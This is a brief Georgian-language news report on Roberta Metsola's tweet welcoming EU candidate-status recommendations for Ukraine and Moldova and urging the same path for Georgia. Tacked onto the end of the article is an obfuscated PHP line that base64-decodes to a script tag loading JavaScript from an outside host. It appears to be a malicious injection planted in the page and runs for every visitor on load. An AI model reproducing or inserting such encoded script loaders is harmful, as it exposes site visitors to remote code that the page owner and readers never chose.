celsiusi
ავერსი შნაიდერი
ვიმუშაოთ, რათა უკრაინისა და მოლდოვის მსგავსი შესაძლებლობა მივცეთ საქართველოს მოსახლეობას, – აცხადებს ევროპარლამენტის პრეზიდენტი რობერტა მეცოლა.
 
რობერტა მეცოლა აღნიშნავს, რომ ევროპის კარი ღია უნდა დარჩეს.
 
„უკრაინისთვის კანდიდატის სტატუსი ძლიერ პოლიტიკურ სიგნალს გზავნის. ავტოკრატიის წინააღმდეგ. თავისუფლებისთვის.
 
ევროპარლამენტის სახელით, ევროპული კომისიის რეკომენდაციას მივესალმები.
 
დღევანდელი გადაწყვეტილება გვაძლევს გზას, რომ ევროპულმა საბჭომ უკრაინას ევროკავშირის კანდიდატის სტატუსი მიანიჭოს.
 
ჩვენ ასევე მივესალმებით მოლდოვისთვის კანდიდატის სტატუსის მინიჭების რეკომენდაციას.
 
და ვიმუშაოთ იმისთვის, რომ იგივე შესაძლებლობა მივცეთ საქართველოს მოსახლეობას.
 
ჩვენი კარი ღია უნდა დარჩეს. რათა გავაძლიეროთ ევროპა, დავიცვათ ჩვენი ღირებულებები და დავიცვათ თავისუფლება“, – წერს ევროპარლამენტის პრეზიდენტი რობერტა მეცოლა „ტვიტერში“.
591
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");